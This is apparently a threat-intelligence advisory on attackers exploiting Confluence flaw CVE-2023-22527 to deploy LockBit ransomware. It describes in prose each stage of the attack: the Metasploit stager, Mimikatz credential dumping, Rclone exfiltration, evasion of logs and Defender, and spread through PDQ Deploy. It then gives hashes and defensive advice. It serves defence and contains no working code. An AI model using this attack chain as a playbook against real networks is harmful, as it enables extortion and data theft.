Hackers Exploit Critical Confluence Server Flaw to Deploy LockBit Ransomware
A recent cyberattack exposed the risks of unpatched servers, as hackers exploited a critical flaw in an Atlassian Confluence instance to deploy LockBit ransomware. The attack leveraged CVE-2023-22527, a remote code execution vulnerability, enabling attackers to run arbitrary commands on the server. This incident underscores the importance of timely patching, robust access controls and proactive cybersecurity defenses.
Technical Description
Critical remote code execution (RCE) vulnerability (CVE-2023-22527) in Atlassian Confluence Data Center and Server, publicly disclosed on January 16, 2024. It stems from improper input handling in the Velocity template engine, allowing unauthenticated attackers to execute arbitrary code via crafted HTTP requests. Exploiting this flaw requires network access to a vulnerable Confluence instance, making exposed servers prime targets. Atlassian has released patches and users are strongly urged to update immediately. Delayed patching increases the risk of ransomware deployment, as seen in recent cyberattacks leveraging this vulnerability.
Initial Access and Exploitation of Confluence Flaw:
The intrusion commenced with the exploitation of CVE-2023-22527, a critical server-side template injection (SSTI) vulnerability with a maximum CVSS score of 10.0, targeting an exposed Atlassian Confluence instance. This weakness allowed unauthenticated adversaries to execute arbitrary system commands by injecting malicious Object-Graph Navigation Language (OGNL) expressions via manipulated HTTP POST requests.
The initial indicators of compromise (IoCs) included reconnaissance activities, such as executing system enumeration commands like net user and whoami, which helped attackers map user privileges and system access levels.Following the foothold establishment, the attackers attempted to retrieve AnyDesk using curl, which initially failed. They then pivoted to using the Windows mshta utility to execute a remote HTA file embedding a Metasploit stager. This facilitated the deployment of a Meterpreter session, granting them command-and-control (C2) capabilities and enabling the download and installation of AnyDesk with a preset password for sustained remote access.
Persistence and Privilege Escalation:
After installing AnyDesk, the attackers configured it for persistence by setting it to start automatically. They quickly enumerated running processes, terminating those linked to a previous intruder but accidentally killing their own Metasploit session, forcing a re-exploitation of Confluence. To maintain access, they created a local admin account, “backup,” and used it for RDP login. They then executed Mimikatz to extract credentials, uncovering a weak “Administrator” password reused across multiple systems, allowing them to move laterally within the network.
Lateral Movement and Data Exfiltration:
The attackers relied heavily on RDP for lateral movement, using SoftPerfect’s NetScan to identify remote hosts. They targeted a backup server, executing Veeam-Get-Creds-New.ps1 to extract credentials from Veeam Backup & Replication. These credentials allowed access to a file share server, where they deployed Rclone to exfiltrate data to MEGA.io. To evade detection, they cleared Windows event logs, deleted introduced tools and manually disabled Windows Defender on compromised hosts.
Deployment of LockBit Ransomware:
In the final stage, the attackers launched LockBit ransomware across the network. They first executed it manually on selected servers via active RDP sessions, then automated its spread using PDQ Deploy from the initial compromised host. PDQ Deploy distributed ransomware binaries and batch scripts over SMB, triggering simultaneous encryption on multiple systems.
To ensure full coverage, they ran a batch script that mounted remote C$ shares, initiating a secondary encryption wave. They then pivoted to an Exchange server, disabling critical services like Exchange and SQL Server before deploying additional ransomware. Files were encrypted with the “.rhddiicoE” extension and a ransom note, “rhddiicoE.README.txt,” was left behind. Finally, they modified desktop backgrounds to display ransom demands.
The attackers strategically employed a range of tools, including Metasploit for initial access and command-and-control, Mimikatz for credential harvesting, and Rclone for data exfiltration, demonstrating a carefully orchestrated attack chain. The deployment of LockBit ransomware was highly coordinated, ensuring widespread disruption and comprehensive encryption across the network.
Conclusion
This attack underscores the critical need for timely patch management, particularly for vulnerabilities like CVE-2023-22527, which facilitated the initial breach. The attackers’ use of Metasploit, Mimikatz, PDQ Deploy, AnyDesk, and Rclone highlights the importance of robust monitoring and detection mechanisms for commonly exploited tools. Implementing strict access controls, enforcing the principle of least privilege and requiring multi-factor authentication (MFA) can significantly reduce credential theft risks.
Enhanced logging of RDP sessions, process creation events and SMB traffic are crucial for early detection of lateral movement and data exfiltration. Additionally, maintaining offline, immutable backups ensure recovery from ransomware attacks, minimizing operational disruption and data loss. A proactive, layered defense strategy is essential to mitigate such sophisticated threats.
Impact
This attack could have severe consequences for organizations, including operational downtime from widespread ransomware encryption, substantial financial losses from ransom demands and costly recovery efforts. The exfiltration of sensitive data to MEGA.io raises serious privacy and compliance concerns, potentially resulting in legal liabilities and reputational damage. The attackers’ rapid execution and advanced tactics expose weaknesses in existing security controls, emphasizing the urgent need for stronger cybersecurity defenses.
IOC and Context Details
| Topics | Details |
|---|---|
| Tactic Name | Impact, Persistence, Lateral Movement, Execution, Defense Evasion, Discovery, Credential Access, Initial Access, Command and Control |
| Technique Name | Data Encrypted for Impact, Create or Modify System Process, Remote Services, Command and Scripting Interpreter, Indicator Removal, System Binary Proxy Execution, Network Share Discovery, Remote System Discovery, System Owner/User Discovery, Process Discovery, System Network Configuration Discovery, Unsecured Credentials, OS Credential Dumping, Exploit Public-Facing Application, Ingress Tool Transfer |
| Sub Technique Name | Windows Service, Remote Desktop Protocol, PowerShell, Windows Command Shell, Clear Windows Event Logs, Mshta, Internet Connection Discovery, Credentials In Files, LSASS Memory |
| Attack Type | Ransomware |
| Targeted Applications | Atlassian Confluence |
| Region Impacted | Global |
| Industry Impacted | All |
| IOC’s |
Hash Sha256: 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155 Sha1:a54af16b2702fe0e5c569f6d8f17574a9fdaf197 MD5:d7addb5b6f55eab1686410a17b3c867b |
| CVE | CVE-2023-22527 |
Recommended Actions
1. Patch Management & Vulnerability Mitigation: Apply security patches promptly, especially for CVE-2023-22527 in Confluence. Update all systems regularly to minimize exploitation risks.
2. Network Segmentation & Access Control: Enforce strict network segmentation to limit lateral movement. Apply the principle of least privilege, restricting admin account access to essential functions.
3. Multi-Factor Authentication (MFA) & Credential Security: Enable MFA for RDP, VPNs and other remote access points. Regularly audit and rotate privileged credentials to reduce credential theft risks.
4. Threat Detection & Monitoring: Implement advanced logging for suspicious activities like unusual RDP sessions, SMB file transfers and PowerShell execution. Use EDR solutions to detect and prevent malicious behavior.
5. Remote Access Tool Restrictions: Restrict the use of tools like AnyDesk and control administrative tool installations. Actively monitor and alert on misuse of legitimate software like PDQ Deploy.
6. Data Protection & Backup Strategy: Maintain offline, immutable backups of critical data. Regularly test restoration procedures to ensure data integrity and minimize ransomware impact.
7. Incident Response & Recovery: Develop an incident response plan and test it regularly to ensure quick containment and recovery from cyberattacks.